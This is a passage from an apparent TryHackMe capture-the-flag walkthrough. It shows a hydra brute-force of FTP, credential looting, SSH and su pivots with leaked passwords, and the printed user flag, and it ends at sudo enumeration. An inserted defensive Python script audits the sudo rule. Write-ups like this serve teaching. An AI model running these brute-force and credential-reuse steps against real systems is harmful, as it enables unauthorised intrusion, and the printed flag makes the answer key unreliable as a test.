Let's save the passwords to a file called ftp_passwords.txt.
Now we can use hydra to brute force the FTP login.
$ hydra -l ftpuser -P /home/kunal/tryhackme/yearoftherabbit/ftp_passwords.txt ftp://10.10.181.61 -t 4
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-06 23:12:11
[DATA] max 4 tasks per 1 server, overall 4 tasks, 82 login tries (l:1/p:82), ~21 tries per task
[DATA] attacking ftp://10.10.181.61:21/
[21][ftp] host: 10.10.181.61 login: ftpuser password: 5iez1wGXKfPKQ
[STATUS] 82.00 tries/min, 82 tries in 00:01h, 1 to do in 00:01h, 3 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-06 23:13:12
So the password for ftpuser is 5iez1wGXKfPKQ.
Let's log in using those credentials.
$ ftp ftpuser@10.10.181.61
Connected to 10.10.181.61.
220 (vsFTPd 3.0.2)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Let's look around for important files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
226 Directory send OK.
We can download the Eli's_Creds.txt file to our machine using the get command.
ftp> get Eli's_Creds.txt
local: Eli's_Creds.txt remote: Eli's_Creds.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
100% |***********************************************************************************************************************************************************************************************| 758 0.74 KiB/s --:-- ETA
226 Transfer complete.
758 bytes received in 00:00 (2.40 KiB/s)
We can try to log in through SSH using these credentials.
$ ssh eli@10.10.181.61
The authenticity of host '10.10.181.61 (10.10.181.61)' can't be established.
ED25519 key fingerprint is SHA256:va5tHoOroEmHPZGWQySirwjIb9lGquhnIA1Q0AY/Wrw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.181.61' (ED25519) to the list of known hosts.
eli@10.10.181.61's password:
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
eli@year-of-the-rabbit:~$
After a bit of searching we can find the user.txt file.
eli@year-of-the-rabbit:~$ cd ../gwendoline/
eli@year-of-the-rabbit:/home/gwendoline$ ls
user.txt
The login message pointed Gwendoline to a "s3cr3t" hiding place. We can now read the .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly! file in /usr/games/s3cr3t.
eli@year-of-the-rabbit:~$ cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!
Yours sincerely
-Root
So now we know that the password for the gwendoline user is MniVCQVhQHUNI.
Let's switch users.
eli@year-of-the-rabbit:~$ su gwendoline
Password:
gwendoline@year-of-the-rabbit:/home/eli$
We can now read the user.txt file we saw earlier.
gwendoline@year-of-the-rabbit:/home/eli$ cd /home/gwendoline/
gwendoline@year-of-the-rabbit:~$ cat user.txt
THM{1107174691af9ff3681d2b5bdb5740b1589bae53}
Answer
THM{1107174691af9ff3681d2b5bdb5740b1589bae53}
What is the root flag?
We can check what commands gwendoline can execute using sudo.
gwendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
Let's check the version of sudo.
gwendoline@year-of-the-rabbit:~$ sudo -V
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3
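From the defender's side, the same two outputs (the sudo -l rule and the sudo -V banner) are enough to flag this configuration in an audit. The following is an added example, not part of the original writeup: the finding names, the EDITORS watch list and the FIXED version threshold are assumptions made for illustration, and the sample strings are copied from the output above.

```python
import re

# Sample input: the `sudo -l` rule and `sudo -V` banner shown above.
SUDO_L = "(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt"
SUDO_V = "Sudo version 1.8.10p3"

# Assumption: 1.8.28 is the upstream release that fixed Runas-exclusion
# handling; distro packages may backport, so confirm with the vendor advisory.
FIXED = (1, 8, 28)
EDITORS = {"vi", "vim", "nano", "emacs", "ed"}  # hypothetical watch list

RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")


def parse_version(banner):
    """Return (major, minor, patch) from a 'Sudo version X.Y.ZpN' line."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("no sudo version in banner")
    return tuple(int(x) for x in m.groups())


def audit(rule_line, banner):
    """Return a list of hardening findings for one `sudo -l` rule."""
    m = RULE.match(rule_line.strip())
    if not m:
        raise ValueError("unrecognised rule: %r" % rule_line)
    # Runas spec is "users[:groups]"; only the user list matters here.
    users = [u.strip() for u in m["runas"].split(":")[0].split(",")]
    negated = [u for u in users if u.startswith("!")]
    findings = []
    if "ALL" in users and negated:
        findings.append("runas-denylist")       # ALL minus exclusions
        if parse_version(banner) < FIXED:
            findings.append("sudo-outdated")    # old release: do not rely on the exclusion
    if "NOPASSWD:" in m["tags"].split():
        findings.append("nopasswd")
    binary = m["cmd"].split()[0].rsplit("/", 1)[-1]
    if binary in EDITORS:
        findings.append("editor-use-sudoedit")  # prefer sudoedit for file edits
    return findings


if __name__ == "__main__":
    for finding in audit(SUDO_L, SUDO_V):
        print(finding)
```

A rule that names the allowed Runas users explicitly, grants no NOPASSWD and uses sudoedit for file edits produces no findings.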
We can find an exploit for that version on Exploit-DB.